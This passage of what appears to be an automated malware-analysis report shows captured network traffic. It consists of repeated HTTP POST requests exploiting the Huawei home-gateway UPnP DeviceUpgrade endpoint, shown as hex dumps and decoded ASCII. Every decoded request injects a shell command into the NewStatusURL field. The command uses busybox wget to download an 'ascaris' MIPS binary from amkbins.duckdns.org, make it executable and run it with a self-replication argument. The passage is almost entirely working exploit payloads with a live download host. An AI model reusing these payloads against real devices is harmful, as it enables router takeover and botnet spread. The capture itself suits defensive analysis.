xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 